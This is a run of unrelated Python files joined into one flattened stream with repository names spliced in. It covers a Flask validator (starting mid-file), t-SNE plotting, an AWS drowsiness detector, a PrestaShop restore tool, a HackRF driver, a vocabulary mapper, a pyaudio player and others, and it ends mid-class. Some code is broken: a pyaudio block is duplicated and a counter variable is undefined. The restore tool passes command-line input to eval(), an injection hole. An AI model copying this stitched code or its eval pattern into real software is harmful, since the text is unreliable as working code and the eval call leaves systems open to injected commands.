d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0])]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) return redirect(url_for('design')) elif request.method == 'GET': # return render_template("index.html") print("No Post Back Call") return render_template("design.html") if __name__ == "__main__": app.run(debug=True)"""An example use case is ```python import time import panel as pn from awesome_panel_extensions.widgets.progress_ext import ProgressExt progress = ProgressExt() run_button = pn.widgets.Button(name="Click me") @progress.increment(50, "incrementing ...") def run(event): time.sleep(0.5) run_button.on_click(run) app = pn.Column(run_button, progress.view) app.servable() ``` which will show the progress and reset every 2 clicks. """ import panel as pn STYLE = """ """ pn.Column( pn.pane.Markdown(__doc__), pn.pane.HTML(STYLE), ).servable() def Articles(): articles = [ { 'id':1, 'title':'Article One', 'body':'This is my first article to the myFlaskApp! It feels really cool to work on this framework.', 'author':'', 'create_date':'12-29-2018' }, { 'id':2, 'title':'Article Two', 'body':'This is my Second article to the myFlaskApp! It feels really cool to work on this framework.', 'author':'', 'create_date':'12-30-2018' }, { 'id':3, 'title':'Article Three', 'body':'This is my Third article to the myFlaskApp! It feels really cool to work on this framework.', 'author':'', 'create_date':'12-31-2018' } ] return articles # -*- coding: utf-8 -*- """ Created on Sun Mar 1 15:31:02 2020 @author: jpeeples """ from sklearn.manifold import TSNE #from barbar import Bar import matplotlib.pyplot as plt import matplotlib.cm as colormap from sklearn.preprocessing import MinMaxScaler import numpy as np import torch from matplotlib import offsetbox from Utils.Compute_FDR import Compute_Fisher_Score import pdb def plot_components(data, proj, images=None, ax=None, thumb_frac=0.05, cmap='copper'): # scaler = MinMaxScaler(feature_range=(0,255)) ax = ax or plt.gca() ax.plot(proj[:, 0], proj[:, 1], '.k') if images is not None: min_dist_2 = (thumb_frac * max(proj.max(0) - proj.min(0))) ** 2 shown_images = np.array([2 * proj.max(0)]) for i in range(data.shape[0]): dist = np.sum((proj[i] - shown_images) ** 2, 1) if np.min(dist) < min_dist_2: # don't show points that are too close continue shown_images = np.vstack([shown_images, proj[i]]) # #Rescale images to be 0 to 255 # for channel in range(0,images.shape[1]): # scaler.fit(images[i,channel]) # scaler.fit_transform(images[i,channel]) imagebox = offsetbox.AnnotationBbox( offsetbox.OffsetImage(images[i],zoom=.2, cmap=cmap), proj[i]) ax.add_artist(imagebox) def Generate_TSNE_visual(dataloaders_dict,model,sub_dir,device,class_names, histogram=True,Separate_TSNE=False): # Turn interactive plotting off, don't show plots plt.ioff() #TSNE visual of train data #Get labels and outputs GT_val = np.array(0) indices_train = np.array(0) model.eval() model.to(device) features_extracted = [] saved_imgs = [] for idx, (inputs, classes,index) in enumerate(dataloaders_dict['train']): images = inputs.to(device) labels = classes.to(device, torch.long) indices = index.to(device).cpu().numpy() GT_val = np.concatenate((GT_val, labels.cpu().numpy()),axis = None) indices_train = np.concatenate((indices_train,indices),axis = None) features = model(images) features = torch.flatten(features, start_dim=1) features = features.cpu().detach().numpy() features_extracted.append(features) saved_imgs.append(images.cpu().permute(0,2,3,1).numpy()) features_extracted = np.concatenate(features_extracted,axis=0) saved_imgs = np.concatenate(saved_imgs,axis=0) #Compute FDR scores GT_val = GT_val[1:] indices_train = indices_train[1:] FDR_scores, log_FDR_scores = Compute_Fisher_Score(features_extracted,GT_val) np.savetxt((sub_dir+'train_FDR.txt'),FDR_scores,fmt='%.2E') np.savetxt((sub_dir+'train_log_FDR.txt'),log_FDR_scores,fmt='%.2f') features_embedded = TSNE(n_components=2,verbose=1,init='random',random_state=42).fit_transform(features_extracted) num_feats = features_extracted.shape[1] fig6, ax6 = plt.subplots() colors = colormap.rainbow(np.linspace(0, 1, len(class_names))) for texture in range (0, len(class_names)): x = features_embedded[[np.where(GT_val==texture)],0] y = features_embedded[[np.where(GT_val==texture)],1] ax6.scatter(x, y, color = colors[texture,:],label=class_names[texture]) plt.title('TSNE Visualization of Training Data Features') # plt.legend(class_names,loc='lower right') box = ax6.get_position() ax6.set_position([box.x0, box.y0 + box.height * 0.1, box.width, box.height * 0.9]) ax6.legend(loc='upper center',bbox_to_anchor=(.5,-.05),fancybox=True,ncol=4) plt.axis('off') fig6.savefig((sub_dir + 'TSNE_Visual_Train_Data.png'), dpi=fig6.dpi) plt.close() #Plot tSNE with images fig9, ax9 = plt.subplots() plot_components(features_extracted,features_embedded,thumb_frac=0.1,images=saved_imgs,cmap=None) # plt.title('TSNE Visualization of Train Data Features with Images') plt.grid('off') plt.axis('off') fig9.savefig((sub_dir + 'TSNE_Visual_Train_Data_Images.png'),dpi=fig9.dpi) plt.close() if (Separate_TSNE): conv_features_embedded = TSNE(n_components=2,verbose=1).fit_transform(features_extracted[:,:num_feats//2]) hist_features_embedded = TSNE(n_components=2,verbose=1).fit_transform(features_extracted[:,num_feats//2:]) GT_val = GT_val[1:] indices_train = indices_train[1:] fig7, ax7 = plt.subplots() colors = colormap.rainbow(np.linspace(0, 1, len(class_names))) for texture in range (0, len(class_names)): x = conv_features_embedded[[np.where(GT_val==texture)],0] y = conv_features_embedded[[np.where(GT_val==texture)],1] plt.scatter(x, y, color = colors[texture,:]) plt.title('TSNE Visualization of Training Data Convolution Features') plt.legend(class_names) fig7.savefig((sub_dir + 'TSNE_Visual_Train_Data_Conv_feats.png'), dpi=fig7.dpi) plt.close() fig10, ax10= plt.subplots() plot_components(features_extracted,conv_features_embedded,images=saved_imgs) # plt.title('TSNE Visualization of Test Data Features with Images') plt.grid('off') plt.axis('off') fig10.savefig((sub_dir + 'TSNE_Visual_Train_Conv_Data_Images.png')) plt.close() fig8, ax8 = plt.subplots() colors = colormap.rainbow(np.linspace(0, 1, len(class_names))) for texture in range (0, len(class_names)): x = hist_features_embedded[[np.where(GT_val==texture)],0] y = hist_features_embedded[[np.where(GT_val==texture)],1] plt.scatter(x, y, color = colors[texture,:]) plt.title('TSNE Visualization of Training Data Histogram Features') plt.legend(class_names) fig8.savefig((sub_dir + 'TSNE_Visual_Train_Data_Hist_feats.png'), dpi=fig8.dpi) fig11, ax11 = plt.subplots() plot_components(features_extracted,hist_features_embedded,images=saved_imgs) # plt.title('TSNE Visualization of Test Data Features with Images') plt.grid('off') plt.axis('off') fig11.savefig((sub_dir + 'TSNE_Visual_Train_Hist_Data_Images.png')) plt.close() # del dataloaders_dict,features_embedded torch.cuda.empty_cache() return FDR_scores, log_FDR_scoreslambda/python/project_drowsy_detector.py import json import boto3 import dlib import cv2 import time from scipy.spatial import distance from imutils import face_utils import imutils import os import numpy as np import time import datetime import websocket import json import requests import base64 try: import thread except ImportError: import _thread as thread import time class webSocket: msg = '' @staticmethod def on_message(ws, message): print('Message ',message) @staticmethod def on_error(ws, error): print('Error ',error) @staticmethod def on_close(ws): print("### closed ###") @staticmethod def on_open(ws): def run(*args): print('Inside Run') ws.send(json.dumps({ "action": "onMessage", "message":webSocket.msg})) ws.close() print("thread terminating...") thread.start_new_thread(run, ()) class drowsyDetector: def __init__(self): self.flag = 0 self.frame_check = 15 self.eye_thresh = 0.22 self.yawn_thres = 0.58 self.lStart,self.lEnd = face_utils.FACIAL_LANDMARKS_68_IDXS["left_eye"] self.rStart,self.rEnd = face_utils.FACIAL_LANDMARKS_68_IDXS["right_eye"] self.mStart,self.mEnd = face_utils.FACIAL_LANDMARKS_68_IDXS["mouth"] self.detect = dlib.get_frontal_face_detector() self.predict = dlib.shape_predictor('/home/ec2-user/shapedetectorfile/shape_predictor_68_face_landmarks.dat') #es config self.severe_count = 0 self.recommend_alert = 0 self.region = 'us-east-1' self.service = 'es' self.host = 'https://search-kibana-test-hrgtvqtpirdohmbmrl5rxrfzua.us-east-1.es.amazonaws.com' self.headers = { "Content-Type": "application/json" } def write_frames_to_s3(self,frame,snap_ts,trip_id): s3 = boto3.client('s3') snap_time = str(snap_ts) #.split('.')[0] imageName = f'{snap_time}.jpeg' print('Image Name ',imageName) cv2.imwrite(imageName, frame) local_image = open('./'+imageName, 'rb') s3 = boto3.client('s3') s3.put_object(Bucket="project-frontend-web", Key = f'img/trips/{trip_id}/{imageName}', Body = local_image, ContentType= 'image/jpeg') os.remove(imageName) def ear_mar_graph(self,snap_time,ear,mouthEAR,trip_id,user_email): snap_ts = datetime.datetime.fromtimestamp(snap_time) snap_ts = snap_ts.strftime("%Y-%m-%d"'T'"%H:%M:%S") json_data = {} json_data['ear'] = ear json_data['mar'] = mouthEAR json_data['time'] = snap_ts json_data['trip_id'] = trip_id json_data['user_email'] = user_email url = f'{self.host}/user_email/_doc/' r = requests.post(url, json=json.loads(json.dumps(json_data)), headers=self.headers) def emit_drowsy_signal(self,snap_time,frame,trip_id,user_email): snap_ts = datetime.datetime.fromtimestamp(snap_time) snap_ts = snap_ts.strftime("%Y-%m-%d"'T'"%H:%M:%S") json_data = {} json_data['snap_time'] = snap_ts json_data['trip_id'] = trip_id json_data['user_email'] = user_email url = f'{self.host}/user_email/_doc/' r = requests.post(url, json=json.loads(json.dumps(json_data)), headers=self.headers) string_to_push = f"{trip_id}; {snap_ts}" #{journey_cords[index][0]}; {journey_cords[index][1]}" websocket.enableTrace(False) ws = websocket.WebSocketApp("wss://gddowyfaka.execute-api.us-east-1.amazonaws.com/dev", on_message = webSocket.on_message, on_error = webSocket.on_error, on_close = webSocket.on_close) webSocket.msg = 'Alert; '+str(string_to_push) if(self.severe_count % 3 == 0): print(webSocket.msg) self.write_frames_to_s3(frame,snap_ts,trip_id) ws.on_open = webSocket.on_open ws.run_forever() def eye_aspect_ratio(self,eye): A = distance.euclidean(eye[1], eye[5]) B = distance.euclidean(eye[2], eye[4]) C = distance.euclidean(eye[0], eye[3]) ear = (A + B) / (2.0 * C) return ear def mouth_aspect_ratio(self,m): A = distance.euclidean(m[3],m[9]) B = distance.euclidean(m[0],m[7]) mar = A/B return mar def gencam(self,frames,user_email,trip_id): #res_dict = self.preloaded_es(trip_id,_id) for frame in frames: frame = imutils.resize(frame, width=450) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) subjects = self.detect(gray, 0) for subject in subjects: shape = self.predict(gray, subject) shape = face_utils.shape_to_np(shape) # converting to NumPy Array leftEye = shape[self.lStart:self.lEnd] rightEye = shape[self.rStart:self.rEnd] mouth = shape[self.mStart:self.mEnd] leftEAR = self.eye_aspect_ratio(leftEye) rightEAR = self.eye_aspect_ratio(rightEye) mouthEAR = self.mouth_aspect_ratio(mouth) ear = (leftEAR + rightEAR) / 2.0 leftEyeHull = cv2.convexHull(leftEye) rightEyeHull = cv2.convexHull(rightEye) mouthHull = cv2.convexHull(mouth) cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1) cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1) cv2.drawContours(frame,[mouthHull],-1,(0,255,255),1) print('Eye ratio ',ear) print('Mouth Ratio ',mouthEAR) if ear <= self.eye_thresh or mouthEAR >= self.yawn_thres: self.flag += 1 if self.flag >= self.frame_check: cv2.putText(frame, "***********************ALERT!********************", (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2) cv2.putText(frame, "*******************ALERT!*********************", (10, 325), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2) #get the snap time for current frame snap_time = time.time() #print('Recommendedation count ',self.severe_count) if(self.severe_count % 3 == 0): self.flag = 0 #self.recommend_alert += 1 #print('------------------------------------------Alert Released for Recommendedation--------------------------------------------') self.ear_mar_graph(snap_time,ear,mouthEAR,trip_id,user_email) self.emit_drowsy_signal(snap_time,frame,trip_id,user_email) else: #print('-------------------Alert Detected but not send-----------------') if(self.flag % 22 == 0): severe_count += 1 self.ear_mar_graph(snap_time,ear,mouthEAR,trip_id,user_email) self.emit_drowsy_signal(snap_time,frame,trip_id,user_email) #dd = drowsyDetector() #dd.gencam([],sys.argv[1],sys.argv[2]) #email,trip_id osmarvalero100/ps17_restoretools/param.py import os from settings import SITES_RESTORE class Param(): def __help(self): """ Muestra la lista de argumentos a pasar por terminal """ info = """ --help Lista los argumentos disponibles. --sites Lista los sitios configurados. -s Nombre del sitio restaurar. -src Pasar los backups locales de manera explicita {'db':'path', 'code': 'path'}. -rsrc Pasar los backups desde el servidor remoto de backups de manera explicita {'db':'path', 'code': 'path'}. -only Solo restaura el objeto indicado (db, code ó img) úselo solo para backup remoto. -full Asigne valor True para realizar una restauración completa (code, db e img). -szdb Obtiene el backup remoto de base de datos de mayor tamaño creado en las últimas 24 horas. """ print(info) def set_params(self, str_params): """ Extrae los parámetros pasados por linea de comando y se asignan a variables de entorno con el nombre de flag Args: str_params (str): Cadena de parametros pasados por terminal """ if len(str_params): for str_param in str_params: if str_param == '--help': self.__help() exit() if str_param == '--sites': for site in SITES_RESTORE.keys(): domain = SITES_RESTORE[site]['LOCAL_SERVER']['SHOP_URL'] print(f' * {site} => {domain}') exit() if '=' in str_param: index_sep = str_param.index('=') flag = str_param[0:index_sep] value = str_param[index_sep+1:len(str_param)] os.environ[flag] = value def getObjects(self): """ Obtiene un listo de objetos a resturara ej: db, code, img Returns: [tuple]: Tupla con objetos a restaurar """ if os.environ.get('-src'): return tuple(eval(os.environ.get('-src')).keys()) elif os.environ.get('-rsrc'): return tuple(eval(os.environ.get('-rsrc')).keys()) else: if os.environ.get('-only'): return (os.environ.get('-only'),) if os.environ.get('-full'): return ('db', 'code', 'img') return ('db', 'code')fietensen/FlappyAI import numpy as np import random def Sigmoid(X): return 1/(1 + np.exp(-X)) class AgentANN: def __init__(self, resolution, child=False): if child: self.hidden1_weights = np.zeros((3, 8)) self.hidden2_weights = np.zeros((8, 4)) self.output_weights = np.zeros((4, 1)) else: self.hidden1_weights = np.random.randn(3, 8) self.hidden2_weights = np.random.randn(8, 4) self.output_weights = np.random.randn(4, 1) def decide(self, screen): hidden1_output = Sigmoid(np.dot(screen, self.hidden1_weights)) hidden2_output = Sigmoid(np.dot(hidden1_output, self.hidden2_weights)) output = Sigmoid(np.dot(hidden2_output, self.output_weights)) return round(output[0]) camkes/parser/stage9.py #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2017, Data61 # Commonwealth Scientific and Industrial Research Organisation (CSIRO) # ABN 41 687 119 230. # # This software may be distributed and modified according to the terms of # the BSD 2-Clause license. Note that NO WARRANTY is provided. # See "LICENSE_BSD2.txt" for details. # # @TAG(DATA61_BSD) # ''' Stage 9 parser. The following parser is designed to accept a stage 8 parser, whose output it consumes. Combine n-1 connections according to the following rule: 1. If an interface is in multiple connections, and in each connection it is on the same end (to or from), all the connections can be combined into a single connection. 2. If an interface is in multiple connections and the condition in 1 does not hold, the spec is invalid. ''' from __future__ import absolute_import, division, print_function, \ unicode_literals from future.utils import iteritems from itertools import chain from camkes.internal.seven import cmp, filter, map, zip from camkes.ast.objects import Connection, ConnectionEnd from .base import Transformer from .exception import ParseError # track a connection def add_connections(connections): candidates = {} for connection in connections: for i in chain(connection.to_ends, connection.from_ends): if i in candidates: candidates[i].add(connection) else: candidates[i] = {connection} return candidates # yields tuples of the form (conns_to_remove, conn_to_add) where conns_to_remove # is a set of connections to remove from the ast, and # conn_to_add is a single connection to replace them with def consolidate(candidates): multi = [] for (_, i) in iteritems(candidates): # Combine connection sets if any two sets share a connection for j in multi: if i & j: j |= i break else: multi.append(i) # We have now combined all of the multi connection definitions for connections in multi: if len(connections) is 1: continue name = ".".join(sorted([c.name for c in connections])) to_ends = {end for c in connections for end in c.to_ends} from_ends = {end for c in connections for end in c.from_ends} connection_type = None for c in connections: if connection_type is not None: if c.type != connection_type: raise ParseError("Multiple connectors used in connections involving %s. (%s, %s)" % (c.name, connection_type, c.type)) assert c.type == connection_type, "Bad type" else: connection_type = c.type new_connection = Connection(connection_type, name, list(from_ends), list(to_ends)) yield(connections, new_connection) class Parse9(Transformer): def precondition(self, ast_lifted, _): return True def postcondition(self, ast_lifted, _): return True def transform(self, ast_lifted, read): candidates = add_connections(ast_lifted.assembly.connections) for (conns_to_remove, conn_to_add) in consolidate(candidates): for c in conns_to_remove: ast_lifted.assembly.connections.remove(c) ast_lifted.assembly.connections.append(conn_to_add) return ast_lifted, read 10-100 """ Decorators """ # 1 Decorators################################################################## # Have a look at the warnings examples in warnings.py. How would you # go about writing a more general deprectation warning if you have # multiple deprecated functions? Wouldn't it be nice to 'decorate' a function # as 'deprecated' instead of explicitely raising a warning each time? # One solution would be a wrapper function, which you apply to your # deprecated functions, eg def wrapper(old_function): print 'do something before' result = old_function() print 'doing something after' return result def deprecated(old_function): print 'A' def wrapper(): print 'deprecated' res = old_function() return res print 'C' return wrapper @deprecated def myfunction(): print 'Myfunction' print 'Calling wrapper explicitely' wrapper(myfunction) print 'Calling myfunction' myfunction() print myfunction # -1 Predefined Decorators ##################################################### # Decorators to be used with methods in classes: # @staticmethod, @classmethod, @abc.abstractmethod, @context.contextmanager # Example code for @classmethod and @abc.abstractmethod import abc class BasePizza(object): __metaclass__ = abc.ABCMeta default_ingredients = ['cheese'] @classmethod @abc.abstractmethod def get_ingredients(cls): """Returns the ingredient list.""" return cls.default_ingredients class DietPizza(BasePizza): def get_ingredients(self): return ['egg'] + super(DietPizza, self).get_ingredients() import numpy as np import time from urh.dev.native.Device import Device from urh.dev.native.lib import hackrf from urh.util.Logger import logger class HackRF(Device): BYTES_PER_SAMPLE = 2 # HackRF device produces 8 bit unsigned IQ data def __init__(self, bw, freq, gain, srate, is_ringbuffer=False): super().__init__(bw, freq, gain, srate, is_ringbuffer) self.success = 0 self.error_not_open = -4242 self._max_bandwidth = 28e6 self._max_frequency = 6e9 self._max_sample_rate = 20e6 self._max_gain = 40 self.error_codes = { 0: "HACKRF_SUCCESS", 1: "HACKRF_TRUE", 1337: "TIMEOUT ERROR", -2: "HACKRF_ERROR_INVALID_PARAM", -5: "HACKRF_ERROR_NOT_FOUND", -6: "HACKRF_ERROR_BUSY", -11: "HACKRF_ERROR_NO_MEM", -1000: "HACKRF_ERROR_LIBUSB", -1001: "HACKRF_ERROR_THREAD", -1002: "HACKRF_ERROR_STREAMING_THREAD_ERR", -1003: "HACKRF_ERROR_STREAMING_STOPPED", -1004: "HACKRF_ERROR_STREAMING_EXIT_CALLED", -4242: "HACKRF NOT OPEN", -9999: "HACKRF_ERROR_OTHER" } # self.__lut = np.zeros(0xffff + 1, dtype=np.complex64) # self.little_endian = False # for i in range(0, 0xffff + 1): # if self.little_endian: # real = (float(np.int8(i & 0xff))) * (1.0 / 128.0) # imag = (float(np.int8(i >> 8))) * (1.0 / 128.0) # else: # real = (float(np.int8(i >> 8))) * (1.0 / 128.0) # imag = (float(np.int8(i & 0xff))) * (1.0 / 128.0) # # self.__lut[i] = complex(real, imag) def reopen(self): if self.is_open: hackrf.reopen() def open(self, init=True): if not self.is_open: if init: ret = hackrf.setup() else: ret = hackrf.open() self.is_open = ret == self.success self.log_retcode(ret, "open") def close(self, exit=True): if self.is_open: logger.info("HackRF: Attempting to close...") time.sleep(0.01) ret = hackrf.close() self.is_open = ret != self.success if self.is_open: logger.error("Failed to close HackRF") else: logger.info("Successfully closed HackRF") self.log_retcode(ret, "close") if exit: self.exit() def exit(self): return hackrf.exit() def start_rx_mode(self): if self.is_open: self.init_recv_buffer() self.set_device_parameters() ret = hackrf.start_rx_mode(self.callback_recv) self.is_receiving = ret == self.success if self.is_receiving: logger.info("HackRF: Starting receiving thread") self._start_readqueue_thread() self.log_retcode(ret, "start_rx_mode") else: self.log_retcode(self.error_not_open, "start_rx_mode") def stop_rx_mode(self, msg): self.is_receiving = False logger.info("HackRF: Stopping RX Mode: "+msg) if hasattr(self, "read_queue_thread") and self.read_queue_thread.is_alive(): try: self.read_queue_thread.join(0.001) logger.info("HackRF: Joined read_queue_thread") except RuntimeError: logger.error("HackRF: Could not join read_queue_thread") if self.is_open: logger.info("stopping HackRF rx mode ({0})".format(msg)) logger.warning("closing because stop_rx_mode of HackRF is bugged and will not allow re receive without close") self.close(exit=False) def switch_from_rx2tx(self): # https://github.com/mossmann/hackrf/pull/246/commits/4f9665fb3b43462e39a1592fc34f3dfb50de4a07 self.reopen() def start_tx_mode(self, samples_to_send: np.ndarray = None, repeats=None, resume=False): if self.is_open: self.init_send_parameters(samples_to_send, repeats, resume=resume) retcode = hackrf.start_tx_mode(self.callback_send) if retcode == self.success: self.is_transmitting = True self._start_sendbuffer_thread() else: self.is_transmitting = False else: retcode = self.error_not_open self.log_retcode(retcode, "start_tx_mode") def stop_tx_mode(self, msg): self.is_transmitting = False try: self.send_buffer_reader.close() self.send_buffer.close() except AttributeError: logger.warning("HackRF: Could not close send buffer, because it was not open yet") if self.is_open: logger.info("stopping HackRF tx mode ({0})".format(msg)) logger.info("closing because stop_tx_mode of HackRF is bugged and never returns") self.close(exit=False) def set_device_bandwidth(self, bw): if self.is_open: retcode = hackrf.set_baseband_filter_bandwidth(bw) else: retcode = self.error_not_open self.log_retcode(retcode, "set_bandwidth", bw) def set_device_frequency(self, value): if self.is_open: retcode = hackrf.set_freq(value) else: retcode = self.error_not_open self.log_retcode(retcode, "set_frequency", value) def set_device_gain(self, gain): if self.is_open: hackrf.set_lna_gain(gain) hackrf.set_vga_gain(gain) hackrf.set_txvga_gain(gain) def set_device_sample_rate(self, sample_rate): if self.is_open: retcode = hackrf.set_sample_rate(sample_rate) else: retcode = self.error_not_open self.log_retcode(retcode, "set_sample_rate", sample_rate) def unpack_complex(self, buffer, nvalues: int): result = np.empty(nvalues, dtype=np.complex64) unpacked = np.frombuffer(buffer, dtype=[('r', np.int8), ('i', np.int8)]) result.real = unpacked['r'] / 128.0 result.imag = unpacked['i'] / 128.0 return result def pack_complex(self, complex_samples: np.ndarray): assert complex_samples.dtype == np.complex64 # tostring() is a compatibility (numpy<1.9) alias for tobytes(). Despite its name it returns bytes not strings. return (128 * complex_samples.view(np.float32)).astype(np.int8).tostring() openkge/index_mapper.py # -*- coding: utf-8 -*- from __future__ import unicode_literals import os import codecs import logging from collections import Counter, defaultdict import torch UNK_TOKEN = '' PAD_TOKEN = '' BOS_TOKEN = '' EOS_TOKEN = '<\s>' PAD, UNK, BOS, EOS = [0, 1, 2, 3] class IndexMapper(object): special_tokens = {PAD_TOKEN:PAD, UNK_TOKEN:UNK} special_tokens_segment = {PAD_TOKEN:PAD, UNK_TOKEN:UNK, BOS_TOKEN:BOS, EOS_TOKEN:EOS} def __init__(self, vocab_file=None, threshold=-1, segment_func=lambda line: line.lower().strip().split(), segment_infix='_token', suffix='.txt', additional_tokens=None, segment=True, insert_start=BOS, insert_end=EOS, ): self.threshold = threshold if additional_tokens is not None: self.special_tokens += additional_tokens self.item2idx = None self.item2segmentidx = None self.token_embedding = None if vocab_file and os.path.isfile(vocab_file): self.load_vocab(vocab_file) self.insert_start = insert_start self.insert_end = insert_end self.segment_func = segment_func self.vocab = None self.segment_vocab = None self.segment_infix = segment_infix self.file_type_suffix = suffix self.segment = segment self._collect_vocab = None self._collect_segment_vocab = None def set_insert_start_and_end(self, insert_start=None, insert_end=None, ): self.insert_start=insert_start self.insert_end=insert_end def update_item2idx(self): item2idx = {item[0]: idx + len(self.special_tokens) for idx, item in enumerate(self.vocab)} for tok,i in self.special_tokens.items(): item2idx[tok] = i self.item2idx = defaultdict(lambda: UNK, item2idx) if self.segment: item2segmentidx = {item[0]: idx + len(self.special_tokens_segment) for idx, item in enumerate(self.segment_vocab)} for tok, i in self.special_tokens_segment.items(): item2segmentidx[tok] = i self.item2segmentidx = defaultdict(lambda: UNK, item2segmentidx) def get_vocab(self, items, append=True,): self.init_vocab(append) for item in items: self.collect_vocab(item) self.finalize_vocab() def init_vocab(self, append=True): if self._collect_vocab is None or not append: self._collect_vocab = Counter() self._collect_segment_vocab = Counter() def collect_vocab(self, item, segment=True): self._collect_vocab[item] += 1 if self.segment and segment: for segm in self.segment_func(item): self._collect_segment_vocab[segm] += 1 def finalize_vocab(self): if self._collect_vocab is not None: self.vocab = [i for i in self._collect_vocab.most_common() if i[1] > self.threshold] if self.segment: self.segment_vocab = [i for i in self._collect_segment_vocab.most_common() if i[1] > self.threshold] self.update_item2idx() self._collect_vocab = None self._collect_segment_vocab = None def save_vocab(self, vocab_filename, map_suffix='_id_map'): if self.vocab is not None: with codecs.open(vocab_filename + map_suffix + self.file_type_suffix, 'w', encoding='UTF-8') as f: f.write("# token\tid\tcount\t\n") for id, key_freq in enumerate(self.vocab): key, freq = key_freq # print(key, id , len(self.special_tokens), freq) f.write("{0}\t{1}\t{2}\n".format(key, id + len(self.special_tokens), freq)) if self.segment: with codecs.open(vocab_filename + self.segment_infix + map_suffix + self.file_type_suffix, 'w', encoding='UTF-8') as f: f.write("# token\tid\tcount\t\n") for id, key_freq in enumerate(self.segment_vocab): key, freq = key_freq f.write("{0}\t{1}\t{2}\n".format(key, id + len(self.special_tokens_segment), freq)) def load_vocab(self, vocab_filename, limit=None, map_suffix='_id_map'): vocab = Counter(self.vocab) logging.info("Loading vocab from {}".format(vocab_filename + self.file_type_suffix)) with codecs.open(vocab_filename + map_suffix + self.file_type_suffix, encoding='UTF-8') as f: for line in f: if line.startswith('#'): continue item, id, count = line.split('\t') vocab[item] = int(count) self.vocab = vocab.most_common(limit) if self.segment: segment_vocab = Counter(self.segment_vocab) with codecs.open(vocab_filename + self.segment_infix + map_suffix + self.file_type_suffix, encoding='UTF-8') as f: for line in f: if line.startswith('#'): continue item, id, count = line.split('\t') segment_vocab[item] = int(count) self.segment_vocab = segment_vocab.most_common(limit) self.update_item2idx() def toidx(self, item, return_tensor=False, insert_start=None, insert_end=None, segment=True): if self.segment and segment: segmented_item = self.segment_func(item) item = [item.strip()] mapped_item = [] mapped_item.extend(map(self.item2idx.__getitem__, item)) if self.segment and segment: insert_start = insert_start if insert_start else self.insert_start insert_end = insert_end if insert_end else self.insert_end mapped_segmented_item = [] if insert_start is not None: mapped_segmented_item += [insert_start] mapped_segmented_item.extend(map(self.item2segmentidx.__getitem__, segmented_item)) if insert_end is not None: mapped_segmented_item += [insert_end] if return_tensor: return torch.IntTensor(mapped_item), torch.IntTensor(mapped_segmented_item), else: return mapped_item, mapped_segmented_item else: if return_tensor: return torch.IntTensor(mapped_item), torch.IntTensor(mapped_item) else: return mapped_item, mapped_item def detokenize(self, inputs, delimiter=u' '): return delimiter.join([self.idx2item(idx) for idx in inputs]).encode('utf-8') class IndexMappers: SegmentIndexMapper = IndexMapperimport time import pyaudio import wave import sys import struct CHUNK = 1024 """ https://www.codeproject.com/Articles/501521/How-to-convert-between-most-audio-formats-in-NET """ def stereo_to_mono(data_in): """ byte[] output = new byte[input.Length / 2]; int outputIndex = 0; for (int n = 0; n < input.Length; n+=4) { // copy in the first 16 bit sample output[outputIndex++] = input[n]; output[outputIndex++] = input[n+1]; } """ output = bytearray() for n in range(len(data_in)): if n % 4 == 0: output.append(data_in[n]) output.append(data_in[n + 1]) return bytes(output) def uint8_to_float(data_in): output = bytearray() for n in range(len(data_in)): output.extend(struct.pack('f', data_in[n] / 255.0)) return bytes(output) def uint8_to_int8(data_in): output = bytearray() for n in range(len(data_in)): output.append((data_in[n] - 128) % 256) return bytes(output) def callback(in_data, frame_count, time_info, status): data = wf.readframes(frame_count) print(data) # return uint8_to_float(stereo_to_mono(data)), pyaudio.paContinue return uint8_to_int8(stereo_to_mono(data)), pyaudio.paContinue if len(sys.argv) < 2: print("Plays a wave file.\n\nUsage: %s filename.wav" % sys.argv[0]) sys.exit(-1) wf = wave.open(sys.argv[1], 'rb') p = pyaudio.PyAudio() stream = p.open( # format=p.get_format_from_width(wf.getsampwidth()), # format=pyaudio.paFloat32, format=pyaudio.paInt8, # channels=wf.getnchannels(), channels=1, # rate=wf.getframerate(), rate=44100, output=True, stream_callback=callback) # print(p.get_format_from_width(wf.getsampwidth())) print(pyaudio.paFloat32) # data = wf.readframes(CHUNK) # # while data != '': # stream.write(uint8_to_float(stereo_to_mono(data))) # data = wf.readframes(CHUNK) stream.start_stream() while stream.is_active(): time.sleep(2) stream.stop_stream() stream.close() p.terminate() wf = wave.open(sys.argv[1], 'rb') p = pyaudio.PyAudio() stream = p.open( # format=p.get_format_from_width(wf.getsampwidth()), # format=pyaudio.paFloat32, format=pyaudio.paInt8, # channels=wf.getnchannels(), channels=1, # rate=wf.getframerate(), rate=44100, output=True, stream_callback=callback) # print(p.get_format_from_width(wf.getsampwidth())) print(pyaudio.paFloat32) # data = wf.readframes(CHUNK) # # while data != '': # stream.write(uint8_to_float(stereo_to_mono(data))) # data = wf.readframes(CHUNK) stream.start_stream() while stream.is_active(): time.sleep(2) stream.stop_stream() stream.close() p.terminate() phlippe/P2_Net import torch import torch.nn as nn import torch.nn.functional as F import argparse import numpy as np import math from random import shuffle, random import os import sys import time # Disable matplotlib screen support import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt from matplotlib.patches import Rectangle from statistics import mean, median from data import DatasetTemplate, DatasetHandler, debug_level, DATA_GLOVE, DATA_BERT, reconstruct_sentences from model_utils import get_device, get_param_val from unsupervised_models.model_loss import * from vocab import get_id2word_dict, get_UNK_index, get_SOS_index from task import TaskTemplate from scheduler_annealing_KL import create_KLScheduler from metrics import * from mutils import add_if_not_none ######################### ## TASK SPECIFIC TASKS ## ######################### class UnsupervisedTask(TaskTemplate): def __init__(self, model, model_params, load_data=True, debug=False, name_suffix="", dataset_fun=None): super(UnsupervisedTask, self).__init__(model=model, model_params=model_params, load_data=load_data, debug=debug, 